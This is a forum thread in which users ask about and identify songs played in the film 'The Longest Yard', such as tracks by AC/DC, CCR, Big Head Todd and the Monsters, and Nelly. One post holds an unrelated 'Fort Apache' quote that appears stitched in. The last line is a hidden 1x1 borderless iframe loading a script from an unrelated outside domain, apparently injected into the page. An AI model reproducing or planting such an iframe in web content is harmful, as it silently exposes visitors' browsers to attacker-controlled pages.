Thanks Thanks:  0
    Credits

The Longest Yard Music (Not the soundtrack)

Does anybody have a list of pretty much all the songs through out the whole movie of, "The Longest Yard". I have been looking every where. I work at a movie theatre, and have access to everything, are the songs listed in the credits of the movie?

Please help me out!!!

Dan

Credits
    Thunderstruck by ACDC
    Gimme Three Steps by Lynyrd Skynyrd
    Paradise City by Guns N' Roses
    Sgt. Johnny Beaufort: He says, "The Apaches are a great race," sir. "They've never been conquered. But it is not well for a nation to be always at war. The young men die... the women sing sad songs... and the old ones are hungry in the winter."
    Fort Apache

Credits
    There's another song in the movie that's not on the soundtrack or in the list above... I've been trying to get this song forever, Cold Case also used it on their commercials pre season 1.

CAN SOMEONE PLEASE HELP ME!!!! I'm dying to get this song!!!

Credits
    ... I think it was the song played when the guys were playing in the mud - I can't remember for sure since I only saw the movie once.

Credits
    I was trying to figure out that song too!!!! It's "Have you ever seen the rain" by CCR (Credence Clearwater Revival)

Credits
    Does anyone know what song comes on as soon as the credits come on, Nelly is in it and I don't think it's on the soundtrack. I, too, work at a movie theater and have to hear it everytime I go in to clean the theater when it lets out, and it's killing me. Help me out.

Credits
    IMDB almost always has this info...

http://www.imdb.com/title/tt0398165/soundtrack

Looks like your Nelly song is called "Errtime"

Credits
    No, it's not Errtime, it comes on as soon as the credits start rolling. He says something like "Y'all don't really want it now", but I can't remember the rest, it's not on the soundtrack.

Credits

Help!@!!!@#@!$!@%@!

okay, after crewe starts to throw the game, he makes a speech, then they go out on offense, and it sounds like an ACDC song is playing but im not sure if thats the band, if anyone has this song PLEASE post it, it starts after the huge mexican dude says "im glad your back, now i dont have to stab you" WTF IS THIS SONG!!!! SOMEONE HELP <3

Credits

i got a music ? 2

hey whats the name of that song, i think it's were they are changing the guys steriod pills w/ the estrogen pills, and the song is somethin like boom boom boom boom, bang bang bang bang, if anybody could help me out that'd be great thanks.

Credits

Boom Boom

Quote Originally Posted by thor_wilson
    hey whats the name of that song, i think it's were they are changing the guys steriod pills w/ the estrogen pills, and the song is somethin like boom boom boom boom, bang bang bang bang, if anybody could help me out that'd be great thanks.
    well, you were on the right track. it's called "Boom Boom" by Big Head Todd and the Monsters.

Credits
    does any one know the name of the song that goes "here come the ...", its wen the black guys come to join the team? any help would be greatly appreciated

Credits
    When the credits come up, the song is "Fly away" and its by Nelly

Credits

Original soundtrack

Personally I found the soundtrack to the original film (and the film itself) more enjoyable

<iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>